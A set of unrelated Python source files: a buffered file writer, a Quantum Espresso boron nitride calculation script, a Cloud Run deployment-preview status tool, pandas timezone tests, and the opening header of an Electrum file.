Buffer is written to file when buffer exceeds strLen
Line separators are not added
"""
lenAndBuffer = self.filePathDict[filePath]
for line in lines:
lenAndBuffer[1].append(line)
lenAndBuffer[0] = lenAndBuffer[0] + len(line)
if lenAndBuffer[0] > self.strLen:
self.__writeToFile(filePath,lenAndBuffer[1])
lenAndBuffer[0] = 0 # set bytes to zero
lenAndBuffer[1] = []
def writeMultipleFiles(self, filePaths, ss):
""" Write strings to multiple files """
for i,filePath in enumerate(filePaths):
self.writeSingleFileLines(filePath, [ss[i]])
def writeSingleFile(self, filePath, s):
"""" Write string to file. """
self.writeSingleFileLines(filePath, [s])
def flush(self, write=True):
""" Flush all buffers, writing to files if write parameter is True"""
for filePath, (_strLen,fileBuffer) in self.filePathDict.items():
if write:
self.__writeToFile(filePath, fileBuffer)
del fileBuffer[:]
def deleteAllFiles(self, flush=True):
""" Delete all files
Flush buffers if flush parameter is true, the default.
"""
if flush:
self.flush(False)
for filePath in self.filePathDict.keys():
if self.outDir is None:
fullPath = filePath
else:
fullPath = os.path.join(self.outDir,filePath)
if os.path.exists(fullPath):
os.remove(fullPath)
def addFile(self, filePath):
""" Add file as file Path
Files are stored in a dictionary with filePath as key
and a list containing [string length integer, list of lines] as the value.
"""
self.filePathDict[filePath] = [0,[]]
def addFiles(self, filePaths):
""" Add files as iterable of full file paths """
for filePath in filePaths:
self.addFile(filePath)
|
|
#
# Author: Henrique Pereira Coutada Miranda
# Run a Silicon groundstate calculation using Quantum Espresso
#
from __future__ import print_function, division
import sys
import argparse
from qepy import *
from schedulerpy import *
from math import sqrt
kpoints = [6,6,1]
kpoints_nscf = [6,6,1]
kpoints_double = [24,24,1]
qpoints = [3,3,1]
layer_separation = 12
pw = 'pw.x'
ph = 'ph.x'
q2r = 'q2r.x'
matdyn = 'matdyn.x'
prefix = 'bn'
npoints = 10
p = Path([ [[0.0, 0.0, 0.0],'$\Gamma$'],
[[0.5, 0.0, 0.0],'M'],
[[1./3,1./3,0.0],'K'],
[[0.0, 0.0, 0.0],'$\Gamma$']], [int(npoints*2),int(npoints),int(sqrt(5)*npoints)])
# scheduler
scheduler = Scheduler.factory
# create the input files
def get_inputfile():
""" Define a Quantum espresso input file for boron nitride
"""
qe = PwIn()
qe.set_atoms([['N',[0.0,0.0,0.5]],
['B',[1/3,2/3,0.5]]])
qe.atypes = {'B': [10.811, "B.pbe-mt_fhi.UPF"],
'N': [14.0067,"N.pbe-mt_fhi.UPF"]}
qe.control['prefix'] = "'%s'"%prefix
qe.control['verbosity'] = "'high'"
qe.control['wf_collect'] = '.true.'
qe.control['pseudo_dir'] = "'../pseudos/'"
qe.system['celldm(1)'] = 4.7
qe.system['celldm(3)'] = layer_separation/qe.system['celldm(1)']
qe.system['ecutwfc'] = 60
qe.system['occupations'] = "'fixed'"
qe.system['nat'] = 2
qe.system['ntyp'] = 2
qe.system['ibrav'] = 4
qe.kpoints = [9, 9, 1]
qe.electrons['conv_thr'] = 1e-10
return qe
#relax
def relax():
if not os.path.isdir('relax'):
os.mkdir('relax')
qe = get_inputfile()
qe.control['calculation'] = "'vc-relax'"
qe.ions['ion_dynamics'] = "'bfgs'"
qe.cell['cell_dynamics'] = "'bfgs'"
qe.cell['cell_dofree'] = "'2Dxy'"
qe.write('relax/%s.relax'%prefix)
#scf
def scf(kpoints,folder='scf'):
if not os.path.isdir(folder):
os.mkdir(folder)
qe = get_inputfile()
qe.control['calculation'] = "'scf'"
qe.kpoints = kpoints
qe.write('%s/%s.scf'%(folder,prefix))
#nscf
def nscf(kpoints,folder='nscf'):
if not os.path.isdir(folder):
os.mkdir(folder)
qe = get_inputfile()
qe.control['calculation'] = "'nscf'"
qe.electrons['diago_full_acc'] = ".true."
qe.electrons['conv_thr'] = 1e-8
qe.system['nbnd'] = 70
qe.system['force_symmorphic'] = ".true."
qe.kpoints = kpoints
qe.write('%s/%s.nscf'%(folder,prefix))
#bands
def bands():
if not os.path.isdir('bands'):
os.mkdir('bands')
qe = get_inputfile()
qe.control['calculation'] = "'bands'"
qe.electrons['diago_full_acc'] = ".true."
qe.electrons['conv_thr'] = 1e-6
qe.system['nbnd'] = 6
qe.system['force_symmorphic'] = ".true."
qe.ktype = 'crystal'
qe.set_path(p)
qe.write('bands/%s.bands'%prefix)
def phonon(kpoints,qpoints,folder='phonon'):
if not os.path.isdir(folder):
os.mkdir(folder)
ph = PhIn()
ph['nq1'],ph['nq2'],ph['nq3'] = qpoints
ph['tr2_ph'] = 1e-8
ph['prefix'] = "'%s'"%prefix
ph['epsil'] = ".false."
ph['trans'] = ".true."
ph['fildyn'] = "'%s.dyn'"%prefix
ph['fildrho'] = "'%s.drho'"%prefix
ph['ldisp'] = ".true."
ph.write('%s/%s.ph'%(folder,prefix))
md = DynmatIn()
md['asr'] = "'simple'"
md['fildyn'] = "'%s.dyn1'"%prefix
md['filout'] = "'%s.modes'"%prefix
md.write('%s/%s.dynmat'%(folder,prefix))
def update_positions(pathin,pathout):
""" update the positions of the atoms in the scf file using the output of the relaxation loop
"""
# Read scaled positions
e = PwXML(prefix,path=pathin)
pos = e.get_scaled_positions()
#open relax input
qin = PwIn.from_file('%s/%s.relax'%(pathin,prefix))
print("old celldm(1)", qin.system['celldm(1)'])
#open scf input
qout = PwIn.from_file('%s/%s.scf'%(pathout,prefix))
#replace lattice parameter
qout.system['celldm(1)'] = e.cell[0][0]
print("new celldm(1)", qout.system['celldm(1)'])
#replace atomic positions
new_atomic_pos = [[qout.atoms[i][0],list(pos[i])] for i in range(len(qout.atoms))]
qout.set_atoms(new_atomic_pos)
#re-write scf input
qout.write('%s/%s.scf'%(pathout,prefix))
def run_plot():
print("running plotting:")
xml = PwXML(prefix=prefix,path='bands')
xml.plot_eigen(p)
def run_projection(show=True):
import matplotlib.pyplot as plt
#write input file
projwfc = ProjwfcIn('bn')
projwfc.write(folder='bands')
projwfc.run(folder='bands')
#read xml file
projection = ProjwfcXML(prefix='bn',path='bands')
n_atom = range(16)
b_atom = range(16,32)
ax = plt.subplot(1,1,1)
cax = projection.plot_eigen(ax,path=p,selected_orbitals=b_atom,selected_orbitals_2=n_atom,size=40,cmap='seismic')
plt.colorbar(cax)
if show: plt.show()
def run_bands(nthreads=1):
print("running bands:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save bands/"%prefix)
qe_run.add_command("cd bands; mpirun -np %d %s -inp %s.bands -nk %d > bands.log"%(nthreads,pw,prefix,nthreads))
qe_run.run()
qe_run.clean()
print("done!")
if __name__ == "__main__":
#parse options
parser = argparse.ArgumentParser(description='Test the yambopy script.')
parser.add_argument('-r' ,'--relax', action="store_true", help='Structural relaxation')
parser.add_argument('-s' ,'--scf', action="store_true", help='Self-consistent calculation')
parser.add_argument('-n' ,'--nscf', action="store_true", help='Non-self consistent calculation')
parser.add_argument('-n2','--nscf_double', action="store_true", help='Non-self consistent calculation for the double grid')
parser.add_argument('-b' ,'--bands', action="store_true", help='Calculate band-structure')
parser.add_argument('-l' ,'--plot', action="store_true", help='Plot band-structure')
parser.add_argument('-o' ,'--orbitals', action="store_true", help='Plot atomic orbital projected band-structure')
parser.add_argument('-p' ,'--phonon', action="store_true", help='Phonon calculation')
parser.add_argument('-d' ,'--dispersion', action="store_true", help='Phonon dispersion')
parser.add_argument('-t' ,'--nthreads', help='Number of threads', default=2 )
args = parser.parse_args()
nthreads = int(args.nthreads)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
# create input files and folders
relax()
scf(kpoints,folder='scf')
nscf(kpoints_nscf)
nscf(kpoints_double, folder='nscf_double')
bands()
phonon(kpoints,qpoints)
if args.relax:
print("running relax:")
qe_run = scheduler()
qe_run.add_command("cd relax; mpirun -np %d %s -inp %s.relax > relax.log"%(nthreads,pw,prefix)) #relax
qe_run.run()
update_positions('relax','scf')
print("done!")
if args.scf:
print("running scf:")
qe_run = scheduler()
qe_run.add_command("cd scf; mpirun -np %d %s -inp %s.scf > scf.log"%(nthreads,pw,prefix)) #scf
qe_run.run()
print("done!")
if args.nscf:
print("running nscf:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save nscf/"%prefix) #nscf
qe_run.add_command("cd nscf; mpirun -np %d %s -nk %d -inp %s.nscf > nscf.log"%(nthreads,pw,nthreads,prefix)) #nscf
qe_run.run()
print("done!")
if args.nscf_double:
print("running nscf_double:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save nscf_double/"%prefix) #nscf
qe_run.add_command("cd nscf_double; mpirun -np %d %s -inp %s.nscf > nscf_double.log"%(nthreads,pw,prefix)) #nscf
qe_run.run()
print("done!")
if args.phonon:
print("running phonon:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save phonon/"%prefix)
qe_run.add_command("cd phonon; mpirun -np %d %s -inp %s.ph > phonon.log"%(nthreads,ph,prefix)) #phonon
qe_run.add_command("dynmat.x < %s.dynmat > dynmat.log"%prefix) #matdyn
qe_run.run()
print("done!")
if args.dispersion:
qe_run = scheduler()
#q2r
disp = DynmatIn()
disp['fildyn']= "'%s.dyn'" % prefix
disp['zasr'] = "'simple'"
disp['flfrc'] = "'%s.fc'" % prefix
disp.write('phonon/q2r.in')
qe_run.add_command('cd phonon; %s < q2r.in'%q2r)
#dynmat
dyn = DynmatIn()
dyn['flfrc'] = "'%s.fc'" % prefix
dyn['asr'] = "'simple'"
dyn['flfrq'] = "'%s.freq'" % prefix
dyn['q_in_cryst_coord'] = '.true.'
dyn.qpoints = p.get_klist()
dyn.write('phonon/matdyn.in')
qe_run.add_command('%s < matdyn.in'%matdyn)
qe_run.run()
# matdyn class to read and plot the frequencies
m = Matdyn.from_modes_file(folder='phonon')
m.plot_eigen(path=p)
if args.bands:
run_bands(nthreads)
run_plot()
if args.orbitals:
run_projection()
if args.plot:
run_plot()
|
|
#!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from typing import Callable, List
import click
import github
from github.GithubException import GithubException
from googleapiclient import discovery
from googleapiclient.errors import HttpError
# cloud run tags much be lowercase
TAG_PREFIX = "pr-"
def make_tag(pr: str) -> str:
return f"{TAG_PREFIX}{pr}"
def get_pr(tag: str) -> int:
return int(tag.replace(TAG_PREFIX, ""))
_default_options = [
click.option(
"--dry-run",
help="Dry-run mode. No tag changes made",
default=False,
is_flag=True,
),
]
_cloudrun_options = [
click.option("--project-id", required=True, help="Google Cloud Project ID"),
click.option(
"--region", required=True, help="Google Cloud Region", default="us-central1"
),
click.option("--service", required=True, help="Google Cloud Run service name"),
]
_github_options = [
click.option(
"--repo-name", required=True, help="GitHub repo name (user/repo, or org/repo)"
)
]
def add_options(options: List[dict]) -> Callable:
def _add_options(func: Callable) -> Callable:
for option in reversed(options):
func = option(func)
return func
return _add_options
def error(msg: str, context: str = None) -> None:
click.secho(f"Error {context}: ", fg="red", bold=True, nl=False)
click.echo(msg)
sys.exit(1)
def get_service(project_id: str, region: str, service_name: str) -> dict:
"""Get the Cloud Run service object"""
api = discovery.build("run", "v1")
fqname = f"projects/{project_id}/locations/{region}/services/{service_name}"
try:
service = api.projects().locations().services().get(name=fqname).execute()
except HttpError as e:
error(re.search('"(.*)"', str(e)).group(0), context="finding service")
return service
def update_service(project_id: str, region: str, service_name: str, body: dict) -> dict:
"""Update the Cloud Run service."""
api = discovery.build("run", "v1")
fqname = f"projects/{project_id}/locations/{region}/services/{service_name}"
try:
result = (
api.projects()
.locations()
.services()
.replaceService(name=fqname, body=body)
.execute()
)
except HttpError as e:
error(re.search('"(.*)"', str(e)).group(0), context="updating service")
return result
def get_revision_url(service_obj: dict, tag: str) -> str:
"""Get the revision URL for the tag specified on the service"""
for revision in service_obj["status"]["traffic"]:
if revision.get("tag", None) == tag:
return revision["url"]
error(
f"Tag on service {service_obj['metadata']['name']} does not exist.",
context=f"finding revision tagged {tag}",
)
def get_revision_tags(service: dict) -> List[str]:
"""Get all tags associated to a service"""
revs = []
for revision in service["status"]["traffic"]:
if revision.get("tag", None):
revs.append(revision)
return revs
@click.group()
def cli() -> None:
"""Tool for setting GitHub Status Checks to Cloud Run Revision URLs"""
pass
@cli.command()
@add_options(_default_options)
@add_options(_cloudrun_options)
@add_options(_github_options)
def cleanup(
dry_run: str, project_id: str, region: str, service: str, repo_name: str
) -> None:
"""Cleanup any revision URLs against closed pull requests"""
service_obj = get_service(project_id, region, service)
revs = get_revision_tags(service_obj)
if not revs:
click.echo("No revision tags found, nothing to clean up")
sys.exit(0)
ghtoken = os.environ.get("GITHUB_TOKEN", None)
if not ghtoken:
raise ValueError("GITHUB_TOKEN not defined.")
try:
repo = github.Github(ghtoken).get_repo(repo_name)
except GithubException as e:
error(e.data["message"], context=f"finding repo {repo_name}")
tags_to_delete = []
for rev in revs:
tag = rev["tag"]
pr = get_pr(tag)
pull_request = repo.get_pull(pr)
if pull_request.state == "closed":
if dry_run:
click.secho("Dry-run: ", fg="blue", bold=True, nl=False)
click.echo(
f"PR {pr} is closed, so would remove tag {tag} on service {service}"
)
else:
tags_to_delete.append(tag)
if tags_to_delete:
# Edit the service by removing the tags from the traffic spec, then replace the service
# with this new configuration.
for tag in tags_to_delete:
for traffic in service_obj["spec"]["traffic"]:
if "tag" in traffic.keys() and tag == traffic["tag"]:
service_obj["spec"]["traffic"].remove(traffic)
click.echo(f"Updating the service to remove tags: {','.join(tags_to_delete)}.")
update_service(project_id, region, service, service_obj)
else:
click.echo("Did not identify any tags to delete.")
@cli.command()
@add_options(_default_options)
@add_options(_cloudrun_options)
@add_options(_github_options)
@click.option("--pull-request", required=True, help="GitHub Pull Request ID", type=int)
@click.option("--commit-sha", required=True, help="GitHub commit (SHORT_SHA)")
# [START cloudrun_deployment_preview_setstatus]
def set(
dry_run: str,
project_id: str,
region: str,
service: str,
repo_name: str,
commit_sha: str,
pull_request: str,
) -> None:
"""Set a status on a GitHub commit to a specific revision URL"""
service_obj = get_service(project_id, region, service)
revision_url = get_revision_url(service_obj, tag=make_tag(pull_request))
ghtoken = os.environ.get("GITHUB_TOKEN", None)
if not ghtoken:
raise ValueError("GITHUB_TOKEN not defined.")
try:
repo = github.Github(ghtoken).get_repo(repo_name)
except GithubException as e:
error(
e.data["message"],
context=f"finding repo {repo_name}. Is it a private repo, and does your token have the correct permissions?",
)
try:
commit = repo.get_commit(sha=commit_sha)
except GithubException as e:
error(e.data["message"], context=f"finding commit {commit_sha}")
# [START_EXCLUDE]
if dry_run:
click.secho("Dry-run: ", fg="blue", bold=True, nl=False)
click.echo(
(
f"Status would have been created on {repo_name}, "
f"commit {commit.sha[:7]}, linking to {revision_url} "
f"on service {service_obj['metadata']['name']}"
)
)
return
# [END_EXCLUDE]
commit.create_status(
state="success",
target_url=revision_url,
context="Deployment Preview",
description="Your preview is now available.",
)
click.secho("Success: ", fg="green", bold=True, nl=False)
click.echo(
f"Status created on {repo_name}, commit {commit.sha[:7]}, "
f"linking to {revision_url} on service {service_obj['metadata']['name']}"
)
# [END cloudrun_deployment_preview_setstatus]
if __name__ == "__main__":
cli()
|
|
"""
Tests for Timestamp timezone-related methods
"""
from datetime import (
date,
datetime,
timedelta,
)
import dateutil
from dateutil.tz import (
gettz,
tzoffset,
)
import pytest
import pytz
from pytz.exceptions import (
AmbiguousTimeError,
NonExistentTimeError,
)
from pandas._libs.tslibs import timezones
from pandas.errors import OutOfBoundsDatetime
import pandas.util._test_decorators as td
from pandas import (
NaT,
Timestamp,
)
class TestTimestampTZOperations:
# --------------------------------------------------------------
# Timestamp.tz_localize
def test_tz_localize_pushes_out_of_bounds(self):
# GH#12677
# tz_localize that pushes away from the boundary is OK
msg = (
f"Converting {Timestamp.min.strftime('%Y-%m-%d %H:%M:%S')} "
f"underflows past {Timestamp.min}"
)
pac = Timestamp.min.tz_localize("US/Pacific")
assert pac.value > Timestamp.min.value
pac.tz_convert("Asia/Tokyo") # tz_convert doesn't change value
with pytest.raises(OutOfBoundsDatetime, match=msg):
Timestamp.min.tz_localize("Asia/Tokyo")
# tz_localize that pushes away from the boundary is OK
msg = (
f"Converting {Timestamp.max.strftime('%Y-%m-%d %H:%M:%S')} "
f"overflows past {Timestamp.max}"
)
tokyo = Timestamp.max.tz_localize("Asia/Tokyo")
assert tokyo.value < Timestamp.max.value
tokyo.tz_convert("US/Pacific") # tz_convert doesn't change value
with pytest.raises(OutOfBoundsDatetime, match=msg):
Timestamp.max.tz_localize("US/Pacific")
def test_tz_localize_ambiguous_bool(self):
# make sure that we are correctly accepting bool values as ambiguous
# GH#14402
ts = Timestamp("2015-11-01 01:00:03")
expected0 = Timestamp("2015-11-01 01:00:03-0500", tz="US/Central")
expected1 = Timestamp("2015-11-01 01:00:03-0600", tz="US/Central")
msg = "Cannot infer dst time from 2015-11-01 01:00:03"
with pytest.raises(pytz.AmbiguousTimeError, match=msg):
ts.tz_localize("US/Central")
result = ts.tz_localize("US/Central", ambiguous=True)
assert result == expected0
result = ts.tz_localize("US/Central", ambiguous=False)
assert result == expected1
def test_tz_localize_ambiguous(self):
ts = Timestamp("2014-11-02 01:00")
ts_dst = ts.tz_localize("US/Eastern", ambiguous=True)
ts_no_dst = ts.tz_localize("US/Eastern", ambiguous=False)
assert (ts_no_dst.value - ts_dst.value) / 1e9 == 3600
msg = "Cannot infer offset with only one time"
with pytest.raises(ValueError, match=msg):
ts.tz_localize("US/Eastern", ambiguous="infer")
# GH#8025
msg = "Cannot localize tz-aware Timestamp, use tz_convert for conversions"
with pytest.raises(TypeError, match=msg):
Timestamp("2011-01-01", tz="US/Eastern").tz_localize("Asia/Tokyo")
msg = "Cannot convert tz-naive Timestamp, use tz_localize to localize"
with pytest.raises(TypeError, match=msg):
Timestamp("2011-01-01").tz_convert("Asia/Tokyo")
@pytest.mark.parametrize(
"stamp, tz",
[
("2015-03-08 02:00", "US/Eastern"),
("2015-03-08 02:30", "US/Pacific"),
("2015-03-29 02:00", "Europe/Paris"),
("2015-03-29 02:30", "Europe/Belgrade"),
],
)
def test_tz_localize_nonexistent(self, stamp, tz):
# GH#13057
ts = Timestamp(stamp)
with pytest.raises(NonExistentTimeError, match=stamp):
ts.tz_localize(tz)
# GH 22644
with pytest.raises(NonExistentTimeError, match=stamp):
ts.tz_localize(tz, nonexistent="raise")
assert ts.tz_localize(tz, nonexistent="NaT") is NaT
def test_tz_localize_ambiguous_raise(self):
# GH#13057
ts = Timestamp("2015-11-1 01:00")
msg = "Cannot infer dst time from 2015-11-01 01:00:00,"
with pytest.raises(AmbiguousTimeError, match=msg):
ts.tz_localize("US/Pacific", ambiguous="raise")
def test_tz_localize_nonexistent_invalid_arg(self):
# GH 22644
tz = "Europe/Warsaw"
ts = Timestamp("2015-03-29 02:00:00")
msg = (
"The nonexistent argument must be one of 'raise', 'NaT', "
"'shift_forward', 'shift_backward' or a timedelta object"
)
with pytest.raises(ValueError, match=msg):
ts.tz_localize(tz, nonexistent="foo")
@pytest.mark.parametrize(
"stamp",
[
"2014-02-01 09:00",
"2014-07-08 09:00",
"2014-11-01 17:00",
"2014-11-05 00:00",
],
)
def test_tz_localize_roundtrip(self, stamp, tz_aware_fixture):
tz = tz_aware_fixture
ts = Timestamp(stamp)
localized = ts.tz_localize(tz)
assert localized == Timestamp(stamp, tz=tz)
msg = "Cannot localize tz-aware Timestamp"
with pytest.raises(TypeError, match=msg):
localized.tz_localize(tz)
reset = localized.tz_localize(None)
assert reset == ts
assert reset.tzinfo is None
def test_tz_localize_ambiguous_compat(self):
# validate that pytz and dateutil are compat for dst
# when the transition happens
naive = Timestamp("2013-10-27 01:00:00")
pytz_zone = "Europe/London"
dateutil_zone = "dateutil/Europe/London"
result_pytz = naive.tz_localize(pytz_zone, ambiguous=0)
result_dateutil = naive.tz_localize(dateutil_zone, ambiguous=0)
assert result_pytz.value == result_dateutil.value
assert result_pytz.value == 1382835600000000000
# fixed ambiguous behavior
# see gh-14621, GH#45087
assert result_pytz.to_pydatetime().tzname() == "GMT"
assert result_dateutil.to_pydatetime().tzname() == "GMT"
assert str(result_pytz) == str(result_dateutil)
# 1 hour difference
result_pytz = naive.tz_localize(pytz_zone, ambiguous=1)
result_dateutil = naive.tz_localize(dateutil_zone, ambiguous=1)
assert result_pytz.value == result_dateutil.value
assert result_pytz.value == 1382832000000000000
# see gh-14621
assert str(result_pytz) == str(result_dateutil)
assert (
result_pytz.to_pydatetime().tzname()
== result_dateutil.to_pydatetime().tzname()
)
@pytest.mark.parametrize(
"tz",
[
pytz.timezone("US/Eastern"),
gettz("US/Eastern"),
"US/Eastern",
"dateutil/US/Eastern",
],
)
def test_timestamp_tz_localize(self, tz):
stamp = Timestamp("3/11/2012 04:00")
result = stamp.tz_localize(tz)
expected = Timestamp("3/11/2012 04:00", tz=tz)
assert result.hour == expected.hour
assert result == expected
@pytest.mark.parametrize(
"start_ts, tz, end_ts, shift",
[
["2015-03-29 02:20:00", "Europe/Warsaw", "2015-03-29 03:00:00", "forward"],
[
"2015-03-29 02:20:00",
"Europe/Warsaw",
"2015-03-29 01:59:59.999999999",
"backward",
],
[
"2015-03-29 02:20:00",
"Europe/Warsaw",
"2015-03-29 03:20:00",
timedelta(hours=1),
],
[
"2015-03-29 02:20:00",
"Europe/Warsaw",
"2015-03-29 01:20:00",
timedelta(hours=-1),
],
["2018-03-11 02:33:00", "US/Pacific", "2018-03-11 03:00:00", "forward"],
[
"2018-03-11 02:33:00",
"US/Pacific",
"2018-03-11 01:59:59.999999999",
"backward",
],
[
"2018-03-11 02:33:00",
"US/Pacific",
"2018-03-11 03:33:00",
timedelta(hours=1),
],
[
"2018-03-11 02:33:00",
"US/Pacific",
"2018-03-11 01:33:00",
timedelta(hours=-1),
],
],
)
@pytest.mark.parametrize("tz_type", ["", "dateutil/"])
def test_timestamp_tz_localize_nonexistent_shift(
self, start_ts, tz, end_ts, shift, tz_type
):
# GH 8917, 24466
tz = tz_type + tz
if isinstance(shift, str):
shift = "shift_" + shift
ts = Timestamp(start_ts)
result = ts.tz_localize(tz, nonexistent=shift)
expected = Timestamp(end_ts).tz_localize(tz)
assert result == expected
@pytest.mark.parametrize("offset", [-1, 1])
@pytest.mark.parametrize("tz_type", ["", "dateutil/"])
def test_timestamp_tz_localize_nonexistent_shift_invalid(self, offset, tz_type):
# GH 8917, 24466
tz = tz_type + "Europe/Warsaw"
ts = Timestamp("2015-03-29 02:20:00")
msg = "The provided timedelta will relocalize on a nonexistent time"
with pytest.raises(ValueError, match=msg):
ts.tz_localize(tz, nonexistent=timedelta(seconds=offset))
@pytest.mark.parametrize("tz", ["Europe/Warsaw", "dateutil/Europe/Warsaw"])
def test_timestamp_tz_localize_nonexistent_NaT(self, tz):
# GH 8917
ts = Timestamp("2015-03-29 02:20:00")
result = ts.tz_localize(tz, nonexistent="NaT")
assert result is NaT
@pytest.mark.parametrize("tz", ["Europe/Warsaw", "dateutil/Europe/Warsaw"])
def test_timestamp_tz_localize_nonexistent_raise(self, tz):
# GH 8917
ts = Timestamp("2015-03-29 02:20:00")
msg = "2015-03-29 02:20:00"
with pytest.raises(pytz.NonExistentTimeError, match=msg):
ts.tz_localize(tz, nonexistent="raise")
msg = (
"The nonexistent argument must be one of 'raise', 'NaT', "
"'shift_forward', 'shift_backward' or a timedelta object"
)
with pytest.raises(ValueError, match=msg):
ts.tz_localize(tz, nonexistent="foo")
# ------------------------------------------------------------------
# Timestamp.tz_convert
@pytest.mark.parametrize(
"stamp",
[
"2014-02-01 09:00",
"2014-07-08 09:00",
"2014-11-01 17:00",
"2014-11-05 00:00",
],
)
def test_tz_convert_roundtrip(self, stamp, tz_aware_fixture):
tz = tz_aware_fixture
ts = Timestamp(stamp, tz="UTC")
converted = ts.tz_convert(tz)
reset = converted.tz_convert(None)
assert reset == Timestamp(stamp)
assert reset.tzinfo is None
assert reset == converted.tz_convert("UTC").tz_localize(None)
@pytest.mark.parametrize("tzstr", ["US/Eastern", "dateutil/US/Eastern"])
def test_astimezone(self, tzstr):
# astimezone is an alias for tz_convert, so keep it with
# the tz_convert tests
utcdate = Timestamp("3/11/2012 22:00", tz="UTC")
expected = utcdate.tz_convert(tzstr)
result = utcdate.astimezone(tzstr)
assert expected == result
assert isinstance(result, Timestamp)
@td.skip_if_windows
def test_tz_convert_utc_with_system_utc(self):
# from system utc to real utc
ts = Timestamp("2001-01-05 11:56", tz=timezones.maybe_get_tz("dateutil/UTC"))
# check that the time hasn't changed.
assert ts == ts.tz_convert(dateutil.tz.tzutc())
# from system utc to real utc
ts = Timestamp("2001-01-05 11:56", tz=timezones.maybe_get_tz("dateutil/UTC"))
# check that the time hasn't changed.
assert ts == ts.tz_convert(dateutil.tz.tzutc())
# ------------------------------------------------------------------
# Timestamp.__init__ with tz str or tzinfo
def test_timestamp_constructor_tz_utc(self):
utc_stamp = Timestamp("3/11/2012 05:00", tz="utc")
assert utc_stamp.tzinfo is pytz.utc
assert utc_stamp.hour == 5
utc_stamp = Timestamp("3/11/2012 05:00").tz_localize("utc")
assert utc_stamp.hour == 5
def test_timestamp_to_datetime_tzoffset(self):
tzinfo = tzoffset(None, 7200)
expected = Timestamp("3/11/2012 04:00", tz=tzinfo)
result = Timestamp(expected.to_pydatetime())
assert expected == result
def test_timestamp_constructor_near_dst_boundary(self):
# GH#11481 & GH#15777
# Naive string timestamps were being localized incorrectly
# with tz_convert_from_utc_single instead of tz_localize_to_utc
for tz in ["Europe/Brussels", "Europe/Prague"]:
result = Timestamp("2015-10-25 01:00", tz=tz)
expected = Timestamp("2015-10-25 01:00").tz_localize(tz)
assert result == expected
msg = "Cannot infer dst time from 2015-10-25 02:00:00"
with pytest.raises(pytz.AmbiguousTimeError, match=msg):
Timestamp("2015-10-25 02:00", tz=tz)
result = Timestamp("2017-03-26 01:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 01:00").tz_localize("Europe/Paris")
assert result == expected
msg = "2017-03-26 02:00"
with pytest.raises(pytz.NonExistentTimeError, match=msg):
Timestamp("2017-03-26 02:00", tz="Europe/Paris")
# GH#11708
naive = Timestamp("2015-11-18 10:00:00")
result = naive.tz_localize("UTC").tz_convert("Asia/Kolkata")
expected = Timestamp("2015-11-18 15:30:00+0530", tz="Asia/Kolkata")
assert result == expected
# GH#15823
result = Timestamp("2017-03-26 00:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 00:00:00+0100", tz="Europe/Paris")
assert result == expected
result = Timestamp("2017-03-26 01:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 01:00:00+0100", tz="Europe/Paris")
assert result == expected
msg = "2017-03-26 02:00"
with pytest.raises(pytz.NonExistentTimeError, match=msg):
Timestamp("2017-03-26 02:00", tz="Europe/Paris")
result = Timestamp("2017-03-26 02:00:00+0100", tz="Europe/Paris")
naive = Timestamp(result.value)
expected = naive.tz_localize("UTC").tz_convert("Europe/Paris")
assert result == expected
result = Timestamp("2017-03-26 03:00", tz="Europe/Paris")
expected = Timestamp("2017-03-26 03:00:00+0200", tz="Europe/Paris")
assert result == expected
@pytest.mark.parametrize(
"tz",
[
pytz.timezone("US/Eastern"),
gettz("US/Eastern"),
"US/Eastern",
"dateutil/US/Eastern",
],
)
def test_timestamp_constructed_by_date_and_tz(self, tz):
# GH#2993, Timestamp cannot be constructed by datetime.date
# and tz correctly
result = Timestamp(date(2012, 3, 11), tz=tz)
expected = Timestamp("3/11/2012", tz=tz)
assert result.hour == expected.hour
assert result == expected
@pytest.mark.parametrize(
"tz",
[
pytz.timezone("US/Eastern"),
gettz("US/Eastern"),
"US/Eastern",
"dateutil/US/Eastern",
],
)
def test_timestamp_add_timedelta_push_over_dst_boundary(self, tz):
# GH#1389
# 4 hours before DST transition
stamp = Timestamp("3/10/2012 22:00", tz=tz)
result = stamp + timedelta(hours=6)
# spring forward, + "7" hours
expected = Timestamp("3/11/2012 05:00", tz=tz)
assert result == expected
def test_timestamp_timetz_equivalent_with_datetime_tz(self, tz_naive_fixture):
# GH21358
tz = timezones.maybe_get_tz(tz_naive_fixture)
stamp = Timestamp("2018-06-04 10:20:30", tz=tz)
_datetime = datetime(2018, 6, 4, hour=10, minute=20, second=30, tzinfo=tz)
result = stamp.timetz()
expected = _datetime.timetz()
assert result == expected
|
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import ssl
import sys
import traceback
import asyncio
import socket
